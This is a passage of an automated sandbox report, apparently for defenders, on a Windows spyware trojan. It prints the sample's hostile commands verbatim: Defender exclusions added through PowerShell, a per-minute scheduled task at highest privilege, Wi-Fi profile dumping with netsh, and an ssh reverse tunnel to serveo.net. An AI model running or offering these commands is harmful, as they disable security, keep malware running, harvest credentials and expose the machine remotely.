                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: jqOHOuPMJP.exe, BootstrapLoader.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: jqOHOuPMJP.exe, BootstrapLoader.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@66/19@3/6
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Mutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                  Source: jqOHOuPMJP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jqOHOuPMJP.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jqOHOuPMJP.exe | ReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exe | Virustotal: Detection: 24%
                  Source: unknown | Process created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe | Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: unknown | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: unknown | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknown | Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: jqOHOuPMJP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: jqOHOuPMJP.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: jqOHOuPMJP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: jqOHOuPMJP.exe Static PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Code function: 0_2_067EE438 pushad ; iretd
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Code function: 0_2_067E648F push es; ret
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Code function: 0_2_067E6592 push esp; ret
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Code function: 0_2_067E7162 push eax; retf
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04F5632D push eax; ret
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04F53A9B push ebx; retf
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe File created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

                  Boot Survival

                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
